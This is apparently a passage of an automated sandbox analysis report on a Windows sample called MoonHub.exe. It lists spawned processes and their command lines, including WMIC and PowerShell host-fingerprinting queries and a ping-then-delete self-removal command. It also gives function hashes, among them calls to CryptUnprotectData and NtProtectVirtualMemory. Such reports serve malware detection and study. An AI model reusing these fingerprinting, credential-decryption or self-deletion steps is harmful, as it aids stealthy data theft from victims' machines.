                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                              Imagebase:0x7ff76d7b0000
                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:25
                                                                                                                                                                              Start time:01:11:03
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:26
                                                                                                                                                                              Start time:01:11:04
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"wmic.exe" csproduct get uuid
                                                                                                                                                                              Imagebase:0x7ff76d7b0000
                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:27
                                                                                                                                                                              Start time:01:11:04
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:28
                                                                                                                                                                              Start time:01:11:04
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:29
                                                                                                                                                                              Start time:01:11:04
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:30
                                                                                                                                                                              Start time:01:11:27
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"wmic" path win32_VideoController get name
                                                                                                                                                                              Imagebase:0x7ff76d7b0000
                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:31
                                                                                                                                                                              Start time:01:11:27
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:32
                                                                                                                                                                              Start time:01:11:30
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\AppData\Local\Temp\MoonHub.exe" && pause
                                                                                                                                                                              Imagebase:0x7ff6fcb20000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:33
                                                                                                                                                                              Start time:01:11:30
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:34
                                                                                                                                                                              Start time:01:11:30
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:ping localhost
                                                                                                                                                                              Imagebase:0x7ff6cde40000
                                                                                                                                                                              File size:22'528 bytes
                                                                                                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Disassembly

                                                                                                                                                                              Reset < >

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00007FF848E90A31 Relevance: .4, Instructions: 398COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2184643349.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff848e90000_resembleC2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fba4c975c33917976c2e858e82e35cf8abae5fc482d714335f83d1166c9a0d07
                                                                                                                                                                                • Instruction ID: 49565514df396b9cdc66cb8a9a37176c8640905da08a265947b93f43d71f28c3
                                                                                                                                                                                • Opcode Fuzzy Hash: fba4c975c33917976c2e858e82e35cf8abae5fc482d714335f83d1166c9a0d07
                                                                                                                                                                                • Instruction Fuzzy Hash: FBD18F30A1C9198FDB98FB68C458ABA73E2FF58355F540279E42AC32D2DF79AC418744
                                                                                                                                                                                Function 00007FF848E903D8 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2184643349.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff848e90000_resembleC2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 3CL_^
                                                                                                                                                                                • API String ID: 0-3907758863
                                                                                                                                                                                • Opcode ID: 8eee37a40c4eb7953d5af1a18bb5dc39de2feb436350db1c2aec3e11385bfdd6
                                                                                                                                                                                • Instruction ID: 3fea3bab84c83e83f0d8728907edcb6bf17e94b278f8668b1ce0daf1588637d6
                                                                                                                                                                                • Opcode Fuzzy Hash: 8eee37a40c4eb7953d5af1a18bb5dc39de2feb436350db1c2aec3e11385bfdd6
                                                                                                                                                                                • Instruction Fuzzy Hash: 61217C62D1EAD54FE766BAB864500F8BFE0BF02644F5800B7C088470A7E6B8984E8349
                                                                                                                                                                                Function 00007FF848E90888 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2184643349.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff848e90000_resembleC2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 3CL_^
                                                                                                                                                                                • API String ID: 0-3907758863
                                                                                                                                                                                • Opcode ID: 12924073a2945093a1ce694f77c949ed342ba6bcaf7d773d277b33bae9ab1587
                                                                                                                                                                                • Instruction ID: 89f8015c539cee6f923b1d62ae3837addeccf6aa9f5a2313532eb1ef7b399d72
                                                                                                                                                                                • Opcode Fuzzy Hash: 12924073a2945093a1ce694f77c949ed342ba6bcaf7d773d277b33bae9ab1587
                                                                                                                                                                                • Instruction Fuzzy Hash: 5CF08220D0E5525EFA6872B840163F96781AF413DCFD90479E40D8A2C3CFBE684182A5
                                                                                                                                                                                Function 00007FF848E904A0 Relevance: .5, Instructions: 502COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2184643349.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff848e90000_resembleC2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5b84d679b1b308c8dc947957560f8af16916235abd253fd2db018a765dbca50c
                                                                                                                                                                                • Instruction ID: 93365fdca44a4850b1413237e29ba4aafb7bc613c32ed11a333bf8432420f654
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b84d679b1b308c8dc947957560f8af16916235abd253fd2db018a765dbca50c
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E411A52E0DEC29FF31577B8181A1A9BBD0FF62364F4C41B7C058460D3EE5958568299
                                                                                                                                                                                Function 00007FF848E904A8 Relevance: .3, Instructions: 277COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2184643349.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff848e90000_resembleC2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 112bf407597a9a94a803bdbedc39001cd66c4b95726229ed589fd576e053e4a1
                                                                                                                                                                                • Instruction ID: 2f2732c824510047cf2da054d0baf22b8629204ffabef5a9138638d2d0e02c41
                                                                                                                                                                                • Opcode Fuzzy Hash: 112bf407597a9a94a803bdbedc39001cd66c4b95726229ed589fd576e053e4a1
                                                                                                                                                                                • Instruction Fuzzy Hash: CB711161E1CA494FE798FB7C58593B9BBD2FF98694F08017AD40EC3282DF7898018756
                                                                                                                                                                                Function 00007FF848E91079 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2184643349.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff848e90000_resembleC2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8fdd8f084cf084b3fad4530c0ccd70ac5e80c4214a4647182f4a20c4301a7250
                                                                                                                                                                                • Instruction ID: 56ecfeeb4ee4c1e312a3a377100a7fd0540b97eb390077c846bce15d3eb9ac54
                                                                                                                                                                                • Opcode Fuzzy Hash: 8fdd8f084cf084b3fad4530c0ccd70ac5e80c4214a4647182f4a20c4301a7250
                                                                                                                                                                                • Instruction Fuzzy Hash: E101C412F1DCD90FE7A8B2BC28596B467C1FB9A695F4801F6D04DC3297DD6F58024345
                                                                                                                                                                                Function 00007FF848E904B0 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2184643349.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff848e90000_resembleC2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4bafee83d6a2019b7b3e9044fc1a8ba9544bccfed8746f91db798592d5dc1dae
                                                                                                                                                                                • Instruction ID: 11c13c650268c827e73e91d9bfb486560aff60b2b3b5a60d8517b52a115beafc
                                                                                                                                                                                • Opcode Fuzzy Hash: 4bafee83d6a2019b7b3e9044fc1a8ba9544bccfed8746f91db798592d5dc1dae
                                                                                                                                                                                • Instruction Fuzzy Hash: 02017B12F1DC890FF7A8B1BC24596B867C1FB8A6A5F4402B5D00DC32C6DD7E58424341
                                                                                                                                                                                Function 00007FF848E909C5 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2184643349.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff848e90000_resembleC2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cdedf66bb228f65c19cca40f9a429cc675b711531e6cb4eb0e17e67998143629
                                                                                                                                                                                • Instruction ID: b717701cddd89711fac294974bc2f84dc05181e91f9fc81b082ae2f6dcffe758
                                                                                                                                                                                • Opcode Fuzzy Hash: cdedf66bb228f65c19cca40f9a429cc675b711531e6cb4eb0e17e67998143629
                                                                                                                                                                                • Instruction Fuzzy Hash: 4DF02B21A0CB514FF794B73C485A4797FD0FF95694F8805BBE448CB1A7EA28E9808385

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:16.9%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:100%
                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                execution_graph 4870 7ff848e59c2e 4871 7ff848e59c5f NtProtectVirtualMemory 4870->4871 4873 7ff848e59d35 4871->4873

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00007FF848E59C2E Relevance: 1.6, APIs: 1, Instructions: 147nativeCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.3380141619.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff848e50000_6z2guuz0ldkdgc1o.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                • Opcode ID: 7a6f96d693dea59f751fae66a657e267d3a07080c1d28c46ba2dbf0bc84d4a63
                                                                                                                                                                                • Instruction ID: 52a5077b1524b5d475ad245666f750bd93c082ed83bea9f73546b714e557885d
                                                                                                                                                                                • Opcode Fuzzy Hash: 7a6f96d693dea59f751fae66a657e267d3a07080c1d28c46ba2dbf0bc84d4a63
                                                                                                                                                                                • Instruction Fuzzy Hash: 9341F87190CB884FDB599B68A8157E97FF1EB9A320F0442AFE089D3253CA745809C7D2

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:14.3%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:100%
                                                                                                                                                                                Total number of Nodes:4
                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                execution_graph 43510 7ff8490536fe 43511 7ff84905371a 43510->43511 43512 7ff849053817 CryptUnprotectData 43511->43512 43513 7ff849053893 43512->43513

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00007FF848EA3218 Relevance: 9.3, Strings: 7, Instructions: 537COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8`=j$8`=j$@`=j$@`=j$@`=j$H`=j$H`=j
                                                                                                                                                                                • API String ID: 0-3727776267
                                                                                                                                                                                • Opcode ID: 806e55b190deb5bafc1100b814a05cf7cc1c9c7b659b3171735a6e40dc2719c6
                                                                                                                                                                                • Instruction ID: 9582d86c8ca3fd41f40ff46831cd04e2c5ecc8ea9b5890f5efe9804eb21ae557
                                                                                                                                                                                • Opcode Fuzzy Hash: 806e55b190deb5bafc1100b814a05cf7cc1c9c7b659b3171735a6e40dc2719c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 01F1D231A0DA4A9FD798EF2884556BA77E2FF99754F0441BDE00AC7292DF389842CB44
                                                                                                                                                                                Function 00007FF848EDB300 Relevance: 3.1, Instructions: 3070COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4142fe5069aaea5e207e3a37d9fdb3bc212d689bf0cd8935e92df34613236cb3
                                                                                                                                                                                • Instruction ID: d826d8eeab4d19515d0c8ae0978295616c7b39cdd7589a0143664518ba45b2b6
                                                                                                                                                                                • Opcode Fuzzy Hash: 4142fe5069aaea5e207e3a37d9fdb3bc212d689bf0cd8935e92df34613236cb3
                                                                                                                                                                                • Instruction Fuzzy Hash: 25334F70A1CB468FD7A8EB188495BAA73E1FF98340F10457DD48EC7296DF34A846CB46
                                                                                                                                                                                Function 00007FF848EACCC8 Relevance: 2.1, Strings: 1, Instructions: 850COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: x6=j
                                                                                                                                                                                • API String ID: 0-1755713205
                                                                                                                                                                                • Opcode ID: 4d53d5b41377f762fb9e6b5051e8588405a3a220eee3fb5239e68175d1699897
                                                                                                                                                                                • Instruction ID: d585ee0ef888049b3ec826668b545ace956b1f1685944d97f9f624be1acda78f
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d53d5b41377f762fb9e6b5051e8588405a3a220eee3fb5239e68175d1699897
                                                                                                                                                                                • Instruction Fuzzy Hash: DD42D131E1CA475FE798BA2C94562B973D2FF94750F54417DE04EC72C2DF38A80A8A89
                                                                                                                                                                                Function 00007FF8490536FE Relevance: 1.7, APIs: 1, Instructions: 224encryptionCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2999957175.00007FF849050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849050000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff849050000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 834300711-0
                                                                                                                                                                                • Opcode ID: c1da01dbf5dedb34834bf80fdb8419bef6471f773e4b692f0176087fd05ddf76
                                                                                                                                                                                • Instruction ID: 6a674dae3c060306c6322547a496a5548ed79ca48d43f2e622dbb9802ef0dcda
                                                                                                                                                                                • Opcode Fuzzy Hash: c1da01dbf5dedb34834bf80fdb8419bef6471f773e4b692f0176087fd05ddf76
                                                                                                                                                                                • Instruction Fuzzy Hash: DC510B71A1CA8C9FDB58EB2C98056B9BBE0FF59711F04427EE44DC3293DE24A8458792
                                                                                                                                                                                Function 00007FF848EAB5B8 Relevance: 1.4, Instructions: 1369COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a7511383ed6f0e98f12721ed8339b34bcf61fc163df8eb43b708b73db226ea23
                                                                                                                                                                                • Instruction ID: a7ee314132de2ff42ea2b1d22d0dac8c9fc206894f3be49f733d635ebdf3cc4b
                                                                                                                                                                                • Opcode Fuzzy Hash: a7511383ed6f0e98f12721ed8339b34bcf61fc163df8eb43b708b73db226ea23
                                                                                                                                                                                • Instruction Fuzzy Hash: CD82F130A0CA4A8FEB98EA1CD451675B3E1FB99350F1442BEC44EC7296DE39EC42C795
                                                                                                                                                                                Function 00007FF848E9E072 Relevance: .8, Instructions: 847COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3508f8257fe7df29c4dfa961a288f1685f47282a3a208a5a9c227aca05d236da
                                                                                                                                                                                • Instruction ID: 5550ebeaf16c6f3dabee49359006ac7abb4ee763b3f6c1191ecc39a258ae96b2
                                                                                                                                                                                • Opcode Fuzzy Hash: 3508f8257fe7df29c4dfa961a288f1685f47282a3a208a5a9c227aca05d236da
                                                                                                                                                                                • Instruction Fuzzy Hash: F252073090DA4AAFD749EBA88452AEBBBE1FF55350F2405BDE009C72D3CA7C9841CB51
                                                                                                                                                                                Function 00007FF848EE22E0 Relevance: .8, Instructions: 840COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 23b0cff9d485ffff91cf18bd99adabf02982063cb775455ce1bb9b9e3f1b916c
                                                                                                                                                                                • Instruction ID: 527dc28535195b2903a15ae972084be91e0944eb47bfee96e5fab5498159da29
                                                                                                                                                                                • Opcode Fuzzy Hash: 23b0cff9d485ffff91cf18bd99adabf02982063cb775455ce1bb9b9e3f1b916c
                                                                                                                                                                                • Instruction Fuzzy Hash: D2426D30A1CE4A8FDA98EA18D081AB6B3E1FFA5340F14457DD44EC3686DF39F8468795
                                                                                                                                                                                Function 00007FF848EE2268 Relevance: .7, Instructions: 740COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 708e1e84e5d27ad015c8b8f9a589fa19acc3fbb3b27f577c986cfc9ab0fcf863
                                                                                                                                                                                • Instruction ID: 6e3afa1f895a70a8f948b4994dcfefb58c147e08281ed191abdaec294d7a0ddc
                                                                                                                                                                                • Opcode Fuzzy Hash: 708e1e84e5d27ad015c8b8f9a589fa19acc3fbb3b27f577c986cfc9ab0fcf863
                                                                                                                                                                                • Instruction Fuzzy Hash: 00425C30A1CA4A8FEB98EB18C494BB5B3E1FF58340F1041B9D44EC7692DF39A885CB55
                                                                                                                                                                                Function 00007FF848EA5740 Relevance: .6, Instructions: 621COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b922415630dc8b70cb959ceacc69aeaca1cd0651fbb9f900f3f0bcb3dc292cbe
                                                                                                                                                                                • Instruction ID: 8e5a51d534494d128f02777478d97b55eeb88e680ff858bffc0de202fde82630
